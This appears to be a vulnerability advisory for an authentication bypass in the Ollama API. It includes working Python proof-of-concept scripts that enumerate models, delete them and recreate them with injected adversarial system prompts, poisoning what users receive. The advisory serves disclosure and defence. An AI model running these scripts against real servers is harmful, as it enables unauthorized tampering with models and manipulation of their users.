
Security Advisory: CVE-2025-63389 - Authentication Bypass in Ollama API

  • CVE ID: CVE-2025-63389
  • Date: 2025-12-18
  • Vendor: Ollama
  • Product: Ollama
  • Affected Versions: <= v0.12.3
  • Vulnerability Type: Incorrect Access Control / Authentication Bypass
  • Severity: Critical (Code Execution, Privilege Escalation, Information Disclosure)

Summary

A critical authentication bypass vulnerability exists in the Ollama platform's API endpoints in versions up to and including v0.12.3. The platform exposes multiple API endpoints without requiring authentication, allowing remote attackers to perform unauthorized model management operations.

Vulnerability Details

  • Component: /api/tags, /v1/models, /api/copy, /api/delete, /api/create, /api/generate, /api/chat endpoints
  • Vulnerability: Missing authentication on critical API endpoints (a minimal probe sketch follows this list).
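
As a minimal sketch of the missing check, the Python snippet below probes the read-only endpoints from the list above. The target host is a placeholder, and the default Ollama port 11434 is assumed.

```python
import urllib.error
import urllib.request

BASE = "http://ollama.example.com:11434"  # hypothetical target; 11434 is Ollama's default port

# On an affected instance, each read-only endpoint answers with
# HTTP 200 and a model listing despite the absence of any credentials.
for path in ("/api/tags", "/v1/models"):
    try:
        with urllib.request.urlopen(BASE + path, timeout=5) as resp:
            print(f"{path} -> HTTP {resp.status} (no authentication required)")
    except urllib.error.HTTPError as exc:
        print(f"{path} -> HTTP {exc.code}")
```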

Attack Vector & Impact

Attack Type: Remote

Attack Vectors: An unauthenticated attacker can exploit the lack of authentication on Ollama's API endpoints to conduct a multi-stage attack (the three stages are chained in the proof-of-concept sketch after this list):

  1. Reconnaissance: Use /api/tags and /v1/models to enumerate existing models.
  2. Resource Manipulation: Use /api/copy, /api/delete, and /api/create to inject malicious system prompts into model configurations.
  3. Model Poisoning: Create poisoned models with identical names but containing adversarial system prompts, delete legitimate models, and force users to interact with compromised models.
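
The stages above can be chained into a single proof of concept. The sketch below is illustrative only: the host and the injected prompt are placeholders, and the request shapes follow Ollama's public API documentation (POST for /api/copy and /api/create, DELETE for /api/delete).

```python
import json
import urllib.request

BASE = "http://ollama.example.com:11434"  # hypothetical target

def request(method, path, payload):
    """Send a JSON request to the unauthenticated Ollama API."""
    req = urllib.request.Request(
        BASE + path,
        data=json.dumps(payload).encode(),
        headers={"Content-Type": "application/json"},
        method=method,
    )
    with urllib.request.urlopen(req, timeout=60) as resp:
        return resp.status

# Stage 1 - reconnaissance: enumerate installed models.
with urllib.request.urlopen(BASE + "/api/tags", timeout=5) as resp:
    victim = json.load(resp)["models"][0]["name"]

# Stage 2 - resource manipulation: keep a copy of the original
# model, then delete it so its name becomes free.
request("POST", "/api/copy", {"source": victim, "destination": victim + "-orig"})
request("DELETE", "/api/delete", {"model": victim})

# Stage 3 - model poisoning: recreate the model under its original
# name with an adversarial system prompt baked into its configuration.
request("POST", "/api/create", {
    "model": victim,
    "from": victim + "-orig",
    "system": "INJECTED SYSTEM PROMPT",  # placeholder payload
})
```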

Impact:

  • Code Execution: Potential for RCE via malicious model configuration or prompt injection.
  • Escalation of Privileges: Unauthorized management of models.
  • Information Disclosure: Enumeration of installed models.
  • Model Poisoning: Manipulation of model behavior (illustrated by the sketch below).
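
For illustration, a victim-side chat request against the replaced model might look like the sketch below; the host and model name are placeholders. On an affected instance, the injected system prompt shapes every response with no visible indication to the client.

```python
import json
import urllib.request

BASE = "http://ollama.example.com:11434"  # hypothetical target

# Any client that talks to the poisoned model unknowingly
# inherits the attacker's system prompt.
req = urllib.request.Request(
    BASE + "/api/chat",
    data=json.dumps({
        "model": "llama3",  # placeholder: name of the replaced model
        "messages": [{"role": "user", "content": "Summarize this document."}],
        "stream": False,
    }).encode(),
    headers={"Content-Type": "application/json"},
)
with urllib.request.urlopen(req, timeout=120) as resp:
    print(json.load(resp)["message"]["content"])
```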

Credits

Discovered and reported by Zhihuang Liu (herecristliu@gmail.com)
